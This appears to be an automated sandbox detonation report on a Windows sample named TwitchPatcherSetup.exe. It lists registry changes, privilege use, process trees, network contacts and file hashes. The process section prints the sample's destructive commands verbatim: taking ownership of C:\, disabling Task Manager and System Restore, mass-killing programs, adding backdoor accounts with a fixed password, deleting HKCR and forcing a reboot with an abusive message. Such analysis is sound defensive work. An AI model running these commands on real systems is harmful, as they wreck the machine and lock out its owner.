72757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Windows\System32\WScript.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Windows\System32\WScript.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\shutdown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2076 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe C:\Windows\system32\cmd.exe
PID 2076 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe C:\Windows\system32\cmd.exe
PID 2076 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe C:\Windows\system32\cmd.exe
PID 924 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 924 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 924 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 924 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 924 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 924 wrote to memory of 1428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 924 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2136 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 924 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 924 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 924 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1736 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 924 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 924 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 924 wrote to memory of 2976 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 924 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1076 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 1896 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 924 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe

"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9388.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9057.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\22951.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 300 -c "Dans 5 minutes tu n'as plus de PC fils de viol, la OGK t'a bien baiser le cul :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13200.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16799.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1123.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\29779.vbs" 11577.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\11577.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21530.vbs"

C:\Windows\system32\net.exe

net user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 18-25 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18-25 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user T'A bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user T'A bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user BIEN bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user BIEN bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user D?TRUIT bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user D?TRUIT bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user LE bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user CUL bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user CUL bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user ENFANT bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user ENFANT bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user DE bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user DE bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user SATAN bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user SATAN bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 265822375520895 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 265822375520895 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 19125836817209 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 19125836817209 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 30108148877259 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 30108148877259 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 239251573925627 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 239251573925627 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 18963165974 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 18963165974 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 1632344953653 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 1632344953653 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 4678262487395 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 4678262487395 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 937014730975 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 937014730975 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 311411974722731 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 311411974722731 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 20505218385761 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 20505218385761 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 271022012222756 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 271022012222756 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 20921730826316 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 20921730826316 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 265822599218799 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 265822599218799 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 103561796027639 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 103561796027639 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 123482739727087 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 123482739727087 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 200142976626644 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 200142976626644 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 315832113316963 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 315832113316963 bitasse /add /expire:never /active:yes

C:\Windows\system32\net.exe

net user 230521891520729 bitasse /add /expire:never /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 230521891520729 bitasse /add /expire:never /active:yes

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

C:\Windows\system32\reg.exe

reg delete HKCR /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.80:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\C11D.tmp\C11E.tmp\C11F.bat

MD5 e5097bb73edc13e33242930a46f4e976
SHA1 1e644b0f44a4e1ea3612a3adea61d2a984f06605
SHA256 97041695f1a22009f88d14a0ab45b61f6ef0c7fd962af2e7495de690df27cbe1
SHA512 7581babda9be534dee091cb9d3bbef984ce0d7c11accdf1fcf409d446c156ba56759c24a822b83e9d9c5413702a99733838f6ed16b3d2e3bfe6ad03c5fe44a9e

C:\Users\Admin\AppData\Local\Temp\9388.vbs

MD5 ed4068f59e84632317fe338a2892ecb1
SHA1 260ca0f384ec0784933794a7aed6fb0ac8aaec23
SHA256 24baf9de71f49028cf6188127dea430347bee63f553225dc93c97db83a4ffeaf
SHA512 93774b5f8e54c16cf65db696613201b88bf64847e8558b8171ec7351e9cdc133a28df6a9f3269add80b8a588761bf9b2c40015cdd5b3e068cee9d069b66be1c5

C:\Users\Admin\AppData\Local\Temp\9057.vbs

MD5 17b8608905bad5079f8ef5d1c8b9aafb
SHA1 65864828c6bc101e9234453e0be83b46868f96e7
SHA256 4d909b6c65777ad719bf85bd5e9de00739b962f2c0bab4a49c0c31fa268e93fc
SHA512 5f2fee37de012f090267c3ad1f4fa2ff5051aa4bf6c5a2a476a4b4e9b1272b16301d3c82d38f33732b767447de8da2ce967a26c1952048c1e8315c7d8e1bfbc1

C:\Users\Admin\AppData\Local\Temp\22951.vbs

MD5 4148025b2c24c93fd1e7d85860e6b816
SHA1 0b5b79f0c4d44b0ebdb990ee6b662f835a07dd98
SHA256 3cb01880c6a02c5f8aad54ee9d5e6a3500777e20c4c07ea56fa267e16f3ad7e0
SHA512 bdf85f2a0581895a28b93dc7038b2d269bdc4a290b778fe3467834b5d8d203f340f41563cfc9c77e22f63a7646c5ce83861c94f687d2dbda06055163a6f8a943

C:\Users\Admin\AppData\Local\Temp\1123.vbs

MD5 523092d53a06f5b46778a0cd7c01d0fb
SHA1 221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA256 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA512 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

C:\Users\Admin\AppData\Local\Temp\13200.vbs

MD5 27bf402bae00ba56abb7fce0eac5fe88
SHA1 7b17239cc71d9a3bd2a42307cc7059a2b2616ce7
SHA256 f54c91b6da58a43d45cd300670055e9569f7006a6428fd5e875b0c59feb0771d
SHA512 6cc36a79ed28cf292c4e6220ee026f3dc47779684600801d60424ca64a53cbff453e983f97559dc93927cccac94a23bf2c0f49cb826b047db9b409fe599c37ef

C:\Users\Admin\AppData\Local\Temp\16799.vbs

MD5 8a9b451fd9936100f33b576bb5ec3f02
SHA1 80c92544f733ddfb96dffa296293fb2835e85f2e
SHA256 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512 b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

C:\Users\Admin\AppData\Local\Temp\21530.vbs

MD5 03b33eb1d025801e1882fc0ba1135c71
SHA1 9a92fcaddcc864bf25eecf1c4165ff0da22016a2
SHA256 338d26cb8fe98ff9377e335a1480cdc37977f346b132ab149cdd33220e0728d7
SHA512 92260a7eb7f760a511900bf5b53f47109783c1b6ca49aa930c171b15b85ac608c2c7243b1fad73baf33b9368e988780f5185f117ff0061b62cd67f138798cfcd

C:\Users\Admin\AppData\Local\Temp\29779.vbs

MD5 ec385d968eea8bf5abe4587305f39c89
SHA1 6509b0bb7cb6432a4c723f37dc7593116ad57c64
SHA256 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512 d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

C:\Users\Admin\AppData\Local\Temp\11577.bat

MD5 c87a392101c9ef2d198ae207e7be82d8
SHA1 c2a3248515376ce6e2f2c3b9d0cc7c8bb6bb55d3
SHA256 8663b0814f18599336aa812324595fe88448c2ceba2994953e0d0b3ae2695bb5
SHA512 416a02c66c9ed020b607db4fb44cd9c09b437f112c235545473fccea5342cbc105cb120d0af859022cc737444fd63a3de637f260468931494a5dd9d1e3d662dd

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\CabF069.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarF08B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 19:33

Reported

2024-08-06 19:36

Platform

win10v2004-20240802-en

Max time kernel

99s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TwitchPatcherSetup.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
